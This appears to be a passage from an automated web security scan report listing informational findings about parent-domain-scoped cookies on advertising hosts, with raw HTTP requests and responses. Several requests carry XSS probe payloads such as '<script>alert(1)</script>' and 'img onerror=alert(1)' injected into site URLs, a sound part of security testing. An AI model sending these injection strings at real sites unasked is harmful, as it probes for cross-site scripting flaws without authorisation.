Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 22:00:34 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_fg2y=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_73th=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h9m4=h0l%3A86c%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: T_4mpe=h0h%3A86c%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: dly2=3-lg2agz-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: hst2=3-lg2agz-1~ufgkw2cbr0lo~i97~4fq7~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Content-Length: 12602

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC
...[SNIP]...

12.25. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Fri, 04 Feb 2011 01:48:43 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_4ffd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_77ak=h0l%3Aiql%3A1; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Set-Cookie: T_1jxt=h0h%3Aiql%3A1; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Set-Cookie: dly2=3-lg2l18-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Set-Cookie: hst2=3-lg2l18-1~g3hog6pegpzy~i9b~4fqb~0-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~iql~1~1-h0l~iql~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Content-Length: 12584

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_
...[SNIP]...

12.26. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23659 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Fri, 04 Feb 2011 01:48:45 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_ahzq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_km24=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1ifd=h0l%3Aiqm%3A1; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Set-Cookie: T_4xsl=h0h%3Aiqm%3A1; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Set-Cookie: dly2=3-lg2l19-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Set-Cookie: hst2=3-lg2l19-1~1kuythfcbtwpz~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~al0-1~15stqp6ba7xf0~i9b~4fqb~ald-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~iqm~1~1-h0l~iqm~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:45 GMT; Path=/
Content-Length: 12605

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC
...[SNIP]...

12.27. http://ads.adap.tv/beacons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacons?callback=jsonp1296766389465 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+12%3A52%3A27";Path=/;Domain=.adap.tv;Expires=Sun, 12-Oct-42 22:39:07 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 129

jsonp1296766389465({
   "beacons":["http://tags.bluekai.com/site/2174", "http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif"]
})

12.28. http://ads.adap.tv/cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /cookie

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cookie?pageUrl=http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22&isTop=true&callback=1 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+12%3A52%3A27";Path=/;Domain=.adap.tv;Expires=Sun, 12-Oct-42 22:39:07 GMT
Content-Type: text/html
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-IrkDsepsOZX1ZbNqoLiwLEpFg8DJDPXRuAgEji6xFyYXq9/YwMsMxEJwIHMl2kJGzasr-boedlgt4/5b-MdL03du1R4faxxhrUosCpAVcVHUBhwLgCAYpolwmThyvB-Kl6NyVnacX8MAy5Ei1K8-2rvbP6l79MS9wQrKqrqJJstb-ubb1GbnZGWUNHSxEL8hrkLiOhBZgvgJvtFuGhN-TrhFyZQW2bDuVQ__;Path=/;Domain=.adap.tv
Content-Length: 0
Server: Jetty(6.1.22)


12.29. http://ads.adap.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+13%3A39%3A06"

Response

HTTP/1.1 404 Not Found
Cache-Control: must-revalidate,no-cache,no-store
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+17%3A50%3A36";Path=/;Domain=.adap.tv;Expires=Mon, 13-Oct-42 03:37:16 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1376
Server: Jetty(6.1.22)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /favicon.ico. Reas
...[SNIP]...

12.30. https://adwords.google.com/select/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /select/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /select/Login HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: I=WVVU7S0BAAA=.9QCH/JbBItRG1yn60m2UCA==.rTh/3xcmrzdhAANAWG9m7g==; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=czKe7_IGyQza5rEyBSFB4A:awfe-efe=czKe7_IGyQza5rEyBSFB4A; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=ZHzCVkZaQtpFBZLK1smDqg; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin
Date: Thu, 03 Feb 2011 20:31:23 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin">here</A>.
</BODY>
</HTML>

12.31. http://app.scanscout.com/ssframework/adStreamJSController.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.scanscout.com
Path:   /ssframework/adStreamJSController.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssframework/adStreamJSController.htm?a=getadscheduleforcontent&format=vast&fetchads=preroll&ss_partnerId=626&ss_mediaId=v18978294NGnK88j8&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaCategories=&ss_mediaKeywords=&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_maxPrerollDuration=30&ss_width=480&ss_height=360&ss_asVersion=3&ss_mediaDescription=&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_acceptNonvideo=Y&jsa=Y HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:34 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; Domain=.scanscout.com; Expires=Sun, 31-Jan-2021 21:07:34 GMT; Path=/
Set-Cookie: uniques=110203|626_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: psh=626_1296767254411; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: behavioralSegments=29_110203|32_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7224


<?xml version="1.0" encoding="UTF-8"?>
<VideoAdServingTemplate>
<Ad id="preroll-1">
<InLine>
<AdSystem>scanscout</AdSystem>
<AdTitle>5945246</AdTitle>
<Impression>
<
...[SNIP]...

12.32. http://app.scanscout.com/ssframework/adStreamJSController.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.scanscout.com
Path:   /ssframework/adStreamJSController.xml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssframework/adStreamJSController.xml?a=getadscheduleforcontent&format=vast&fetchads=overlay&ss_partnerId=626&ss_height=360&ss_width=480&asVersion=3&jsa=Y&blacklist=&ss_mediaCategories=&ss_mediaDescription=&ss_mediaId=v18978294NGnK88j8&ss_mediaKeywords=&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; behavioralSegments=29_110203|32_110203|263_110203

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:14:03 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: osh=626_1296767643681; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:03 GMT; Path=/
Set-Cookie: behavioralSegments=29_110203_2|32_110203_2|263_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:03 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 697


<?xml version="1.0" encoding="UTF-8"?>
<VideoAdServingTemplate>
<Ad id="overlay-1">
<InLine>
<AdSystem>scanscout</AdSystem>
<AdTitle>5933179</AdTitle>
<NonLinearAds>

...[SNIP]...

12.33. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p59844736&PRAd=60056&AR_C=656 HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Feb 2011 22:03:49 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: ar_p59844736=exp=1&initExp=Thu Feb 3 22:03:49 2011&recExp=Thu Feb 3 22:03:49 2011&prad=60056&arc=656&; expires=Wed 04-May-2011 22:03:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296770629; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

12.34. http://audience.visiblemeasures.com/u/getuid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://audience.visiblemeasures.com
Path:   /u/getuid/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /u/getuid/?nocache=0%2E6689167399890721&a=715b8c3a075d11dea9710019b9f1584b HTTP/1.1
Host: audience.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:08:03 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV"
Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 21:08:03 GMT
Set-Cookie: sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 21:38:03 GMT
Content-Type: text/plain
